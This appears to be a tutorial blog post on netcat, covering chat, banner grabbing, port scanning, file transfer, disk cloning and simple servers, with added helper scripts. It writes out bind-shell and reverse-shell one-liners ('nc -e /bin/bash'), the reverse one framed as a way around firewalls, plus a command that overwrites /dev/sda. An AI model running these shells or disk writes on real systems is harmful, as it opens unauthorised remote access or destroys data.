Netcat Ninjutsu

Netcat is an extremely flexible tool. It follows the Unix philosophy that programs should do one thing and do it well. At its simplest netcat lets you connect to and listen on UDP or TCP sockets, but as I'll show it can be very powerful. It comes standard on most Unixes, including Linux and BSD, and can be freely downloaded for Windows.


Network Chat
To begin we'll look at setting up a server and a client to create a simple instant messenger. To start a server listening on port 4242 we just run:
netcat -v -lp 4242
On the client side we connect to our server (192.168.1.1) on port 4242 with:
nc -v 192.168.1.2 4242
From here if you type any message on either computer the message will appear on the other.

Banner grabbing
To grab the banner of a website just do:
netcat -v 192.168.1.1 80
and type any invalid request such as 'hello':
localhost.localdomain [192.168.1.1] 80 (www) open 
hello
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>501 Method Not Implemented</title>
</head><body>
<h1>Method Not Implemented</h1>
<p>hello to /index.html not supported.<br />
</p>
<hr>
<address>Apache/2.2.16 (Ubuntu) Server at 192.168.1.1 Port 80</address>
</body></html>
Here we can see that the host is running Apache 2.2.16 on Ubuntu.

Port Scanning
It is possible to use netcat as a very simple port scanner. The following command scans 192.168.1.1 on TCP ports 1 to 1000:
nc -v -w 1 -z 192.168.1.1 1-1000
You can see below that ports 80, 139, 445 and 902 are open.
user@pc~$ nc -v -w 1 -z 192.168.1.1 1-1000
pc [192.168.1.1] 902 (?) open
pc [192.168.1.1] 445 (microsoft-ds) open
pc [192.168.1.1] 139 (netbios-ssn) open
pc [192.168.1.1] 80 (www) open
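Picking the open ports out of that verbose output by eye is fine for a short range but not for a long one. The script below is an added example and not part of the original post: it parses the "open" lines netcat prints (on stderr, hence the 2>&1 in the wrapper) into a sorted "port service" list and a count. The sample lines are a constructed copy of the scan above with one refused port added to show it is filtered out; the host and range arguments of the wrapper are placeholders.

```sh
#!/bin/sh
# Added example (not from the original post): summarise "nc -v -z" output.
# Assumes a POSIX shell with awk, sort, wc and tr.

# Parse "host [addr] PORT (service) open" lines on stdin and print one
# "PORT service" pair per line, lowest port first.
open_ports() {
    awk '$NF == "open" {
            port = $3
            svc  = $4
            gsub(/[()]/, "", svc)        # strip the parentheses around the service name
            if (svc == "?") svc = "unknown"
            print port, svc
        }' | sort -n
}

# Count the open ports in scan output given on stdin
count_open() {
    open_ports | wc -l | tr -d ' '
}

# Scan and summarise in one go (needs nc and a reachable host; not run here).
# netcat writes its -v messages to stderr, so merge it into the pipe.
scan_summary() {
    host=$1
    range=$2
    nc -v -w 1 -z "$host" "$range" 2>&1 | open_ports
}

# Constructed sample, mirroring the scan shown above plus one refused port
SAMPLE_SCAN='pc [192.168.1.1] 902 (?) open
pc [192.168.1.1] 445 (microsoft-ds) open
pc [192.168.1.1] 139 (netbios-ssn) open
pc [192.168.1.1] 80 (www) open
pc [192.168.1.1] 81 (?) : Connection refused'

# Usage on the sample: printf '%s\n' "$SAMPLE_SCAN" | open_ports
```

Only lines whose last field is "open" are kept, so the refused and timed-out ports that appear with more verbose flags never reach the summary.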

Remote shell
So far we have used netcat on its own, but the real beauty of the Unix philosophy is that programs can be chained together to make them more powerful. Each takes care of its own small part; in this case netcat provides the network connection for another program. If, for instance, we wanted a remote console or shell, we can connect the shell program bash to a listening netcat server on port 4242 with:
nc -lvp 4242 -e /bin/bash
or the console in windows with:
nc -lvp 4242 -e cmd.exe
To connect, simply use:
nc -v 192.168.1.2 4242
user@pc~$ nc -v 127.0.0.1 4242
pc [192.168.1.1] 4242 (?) open
ifconfig
eth0      Link encap:Ethernet  HWaddr d4:9a:20:e4:d8:1c  
          inet addr:192.168.0.1  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::d69a:20ff:fee4:d81c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2215688 errors:1 dropped:0 overruns:0 frame:1
          TX packets:1935623 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2006473900 (2.0 GB)  TX bytes:572179986 (572.1 MB)
          Interrupt:42 Base address:0x4000 


Reverse remote shell
In the previous example we created a server that allowed a client to connect; upon connection the client was given a shell. To get around firewalls and IP address issues we sometimes need a reverse shell. In this case the client connects to the server and provides it with a shell. We also use port 80, which is probably allowed through the firewall. We set up the waiting server with:
nc -lvp 80
And connect from the client, attaching the shell, with:
nc -vn 192.168.1.2 80 -e /bin/bash
This time the server side is dropped into the shell. When we disconnect, though, the server will exit, and we'd like to keep it available so we can reconnect. To do this we can put a loop around it with:
while true; do nc -lvp 80; done
Now the while loop restarts the server each time it exits.

File transfer
Netcat simply sends data across the network; it doesn't care what the data is, so we are able to send files by piping data in and out of netcat. To send a file we first set up a server that will receive the file:
server: nc -vn -lp 4242 > fileRecieved
Then we connect with the client and send the data to the server:
client: nc -vn 192.168.1.2 4242 < fileSent
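Because netcat just moves bytes, the receiving side has no way to tell a dropped connection from the end of the file, and nothing checks that the bytes arrived unchanged. The script below is an added example, not part of the original post: the sender publishes the file's size and SHA-256 out of band (over the chat session from the first section, or any other channel) and the receiver verifies both before trusting the file. It assumes sha256sum (coreutils) or shasum (perl) is available; the files under /tmp are constructed for the demonstration.

```sh
#!/bin/sh
# Added example (not from the original post): integrity check for a file
# received over netcat.  Assumes sha256sum or shasum, wc, head and cp.

# Print the SHA-256 hex digest of a file with whichever tool is installed
file_digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Print the size of a file in bytes
file_size() {
    wc -c < "$1" | tr -d ' '
}

# Sender side: the "SIZE DIGEST" line to pass along with the file
transfer_manifest() {
    printf '%s %s\n' "$(file_size "$1")" "$(file_digest "$1")"
}

# Receiver side: 0 if size and digest both match, 1 with a reason otherwise.
# The size check runs first because it is cheap and catches the common
# failure, a connection that closed part-way through the transfer.
verify_transfer() {
    expected_size=$1
    expected_digest=$2
    received=$3
    if [ "$(file_size "$received")" != "$expected_size" ]; then
        echo "size mismatch: transfer truncated or padded" >&2
        return 1
    fi
    if [ "$(file_digest "$received")" != "$expected_digest" ]; then
        echo "digest mismatch: content altered in transit" >&2
        return 1
    fi
    return 0
}

# How the page's commands fit around it (not run here):
#   sender:   transfer_manifest fileSent ; nc -vn 192.168.1.2 4242 < fileSent
#   receiver: nc -vn -lp 4242 > fileRecieved ; verify_transfer SIZE DIGEST fileRecieved

# Constructed demonstration files
printf 'payload line 1\npayload line 2\n' > /tmp/nc_demo_sent
cp /tmp/nc_demo_sent /tmp/nc_demo_ok                               # clean transfer
head -c 20 /tmp/nc_demo_sent > /tmp/nc_demo_truncated              # connection dropped mid-way
printf 'payload line 1\npayload line X\n' > /tmp/nc_demo_altered   # same size, one byte changed
```

The manifest is two words on one line, so it can be pasted into the chat session or read back over the phone; the digest, not the size, is what proves the content is what was sent.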

Stream music
Since it's just data we can also stream music.
nc -lp 4242 | mpg123
cat mySong.mp3 | netcat 192.168.1.2 4242

Copy an entire hard drive across the internet
We can even copy an entire drive over a network or the internet by connecting dd and nc:

nc -l -p 4242 | dd of=/dev/sda

dd if=/dev/sda | nc 192.168.1.1 4242

Keep in mind that the drives must be unmounted and that it will take a while.

Web server
You can even throw together a quick and dirty webserver with:
while true; do nc -l -p 80 -q 1 < index.html; done
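The one-liner above sends the bare file with no status line or headers, which most browsers tolerate but which is not a valid HTTP response, and with no Content-Length the client only learns the page has ended when the -q 1 timeout closes the connection. As an added example (not part of the original post), the script below builds a minimal, well-formed HTTP/1.0 response for a file so it can be piped into the listening netcat instead of redirected in. The sample page under /tmp is constructed for the demonstration and the file names are assumptions.

```sh
#!/bin/sh
# Added example (not from the original post): wrap a file in a minimal
# HTTP/1.0 response for the netcat web server.  Assumes a POSIX shell
# with printf, wc, tr and cat.

# Print a complete HTTP response for FILE: status line, headers, blank
# line, body.  Missing or unreadable files get a 404 instead of an error
# message from the shell.
http_response() {
    file=$1
    if [ ! -r "$file" ]; then
        body="<html><body><h1>404 Not Found</h1></body></html>"
        printf 'HTTP/1.0 404 Not Found\r\n'
        printf 'Content-Type: text/html\r\n'
        printf 'Content-Length: %s\r\n' "$(printf '%s' "$body" | wc -c | tr -d ' ')"
        printf 'Connection: close\r\n\r\n'
        printf '%s' "$body"
        return 1
    fi
    case "$file" in
        *.html|*.htm) ctype="text/html" ;;
        *.txt)        ctype="text/plain" ;;
        *)            ctype="application/octet-stream" ;;
    esac
    length=$(wc -c < "$file" | tr -d ' ')     # exact byte count for Content-Length
    printf 'HTTP/1.0 200 OK\r\n'
    printf 'Content-Type: %s\r\n' "$ctype"
    printf 'Content-Length: %s\r\n' "$length"
    printf 'Connection: close\r\n\r\n'
    cat "$file"
}

# Just the status line of the response for FILE, CR stripped
http_status_line() {
    http_response "$1" | head -n 1 | tr -d '\r'
}

# Constructed sample page for the demonstration
printf '<html><body><h1>hello</h1></body></html>\n' > /tmp/nc_demo_index.html

# To serve it, pipe the response in rather than redirecting the raw file
# (same flags as the original one-liner; not run here):
#   while true; do http_response /tmp/nc_demo_index.html | nc -l -p 80 -q 1; done
```

With Content-Length present the client knows exactly when the body ends, so -q 1 only serves as a safety net for slow readers rather than as the signal that the page is complete.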

Port forwarding
We can even connect netcat to netcat to redirect traffic. In the following example a netcat server listens on port 8080; any traffic arriving on port 8080 is piped into a netcat client connected to www.example.com port 80. Note that this pipe only carries data one way: the replies from www.example.com come out on the second netcat's standard output rather than going back to the original client, so a two-way relay needs a return path, such as a named pipe, between the two processes.
nc -l 8080 | nc www.example.com 80